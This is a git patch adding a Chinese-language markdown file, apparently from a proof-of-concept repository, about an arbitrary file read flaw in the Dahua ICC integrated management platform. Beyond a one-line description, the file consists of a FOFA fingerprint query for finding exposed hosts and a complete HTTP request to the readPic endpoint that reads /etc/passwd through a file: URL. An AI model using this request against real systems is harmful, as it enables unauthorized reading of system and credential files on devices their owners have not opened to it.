From c0c2aeef583eefd28ca82cd6da1b39c85d6126a3 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Thu, 23 Nov 2023 19:13:13 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E5=A4=A7=E5=8D=8E=E6=99=BA=E8=83=BD?= =?UTF-8?q?=E7=89=A9=E8=81=94ICC=E7=BB=BC=E5=90=88=E7=AE=A1=E7=90=86?= =?UTF-8?q?=E5=B9=B3=E5=8F=B0readpic=E4=BB=BB=E6=84=8F=E6=96=87=E4=BB=B6?= =?UTF-8?q?=E8=AF=BB=E5=8F=96=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...物联ICC综合管理平台readpic任意文件读取漏洞.md | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 大华智能物联ICC综合管理平台readpic任意文件读取漏洞.md diff --git a/大华智能物联ICC综合管理平台readpic任意文件读取漏洞.md b/大华智能物联ICC综合管理平台readpic任意文件读取漏洞.md new file mode 100644 index 0000000..4eca560 --- /dev/null +++ b/大华智能物联ICC综合管理平台readpic任意文件读取漏洞.md @@ -0,0 +1,27 @@ + +## 大华智能物联ICC综合管理平台readpic任意文件读取漏洞 +大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。该平台的 "readpic" 接口存在一个任意文件读取漏洞,恶意攻击者可通过文件读取漏洞进行访问和读取系统中的文件,包括配置文件、日志和其他敏感数据,从而利用攻击。 + +## fofa +``` +:body="*客户端会小于800*" +``` + +## poc +``` +GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/2 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: none +Sec-Fetch-User: ?1 +If-None-Match: W/"63ba2750-93e" +Te: trailers +``` + +![be62ca49838833e8b7527d0ab2dd5541](https://github.com/wy876/POC/assets/139549762/25cb6acd-b1bc-4012-a52e-92356d47ada5)